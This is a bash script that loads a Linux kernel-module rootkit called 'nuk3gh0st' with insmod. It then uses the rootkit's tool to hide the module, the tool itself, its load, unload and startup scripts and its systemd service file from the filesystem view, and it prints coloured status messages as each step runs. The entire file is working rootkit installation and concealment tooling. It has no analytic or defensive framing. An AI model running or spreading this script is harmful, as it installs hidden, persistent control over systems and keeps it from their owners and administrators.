#!/bin/bash

green='\e[0;32m'
red='\e[0;31m'
purple='\e[0;35m'
yellow='\e[0;33m'
endColor='\e[0m'
item=${green}[*]${endColor}

echo -e "${item}Loading nuk3gh0st LKM rootkit"
echo -e "   ${purple}cmd: insmod /usr/lib/rootkit.ko${endColor}"
insmod /usr/lib/rootkit.ko
echo -e "${item}Hidding nuk3gh0st files"
echo -e "${yellow}WARNING: you won't be able to see the installation folder"
echo -e "until you unload the rootkit, but it will still exist "
echo -e "and you can access to it if you remember the path${endColor}"
echo -e "   ${purple}cmd: nuk3gh0st --hide-file=rootkit.ko${endColor}"
nuk3gh0st --hide-file=rootkit.ko
echo -e "   ${purple}cmd: nuk3gh0st --hide-file=nuk3gh0st${endColor}"
nuk3gh0st --hide-file=nuk3gh0st
echo -e "   ${purple}cmd: nuk3gh0st --hide-file=load-nuk3gh0st${endColor}"
nuk3gh0st --hide-file=load-nuk3gh0st
echo -e "   ${purple}cmd: nuk3gh0st --hide-file=unload-nuk3gh0st${endColor}"
nuk3gh0st --hide-file=unload-nuk3gh0st
echo -e "   ${purple}cmd: nuk3gh0st --hide-file=startup-nuk3gh0st${endColor}"
nuk3gh0st --hide-file=startup-nuk3gh0st
echo -e "   ${purple}cmd: nuk3gh0st --hide-file=rmstartup-nuk3gh0st${endColor}"
nuk3gh0st --hide-file=rmstartup-nuk3gh0st
echo -e "   ${purple}cmd: nuk3gh0st --hide-file=nuk3gh0st.startup${endColor}"
nuk3gh0st --hide-file=nuk3gh0st.startup
echo -e "   ${purple}cmd: nuk3gh0st --hide-file=nuk3gh0st.service${endColor}"
nuk3gh0st --hide-file=nuk3gh0st.service
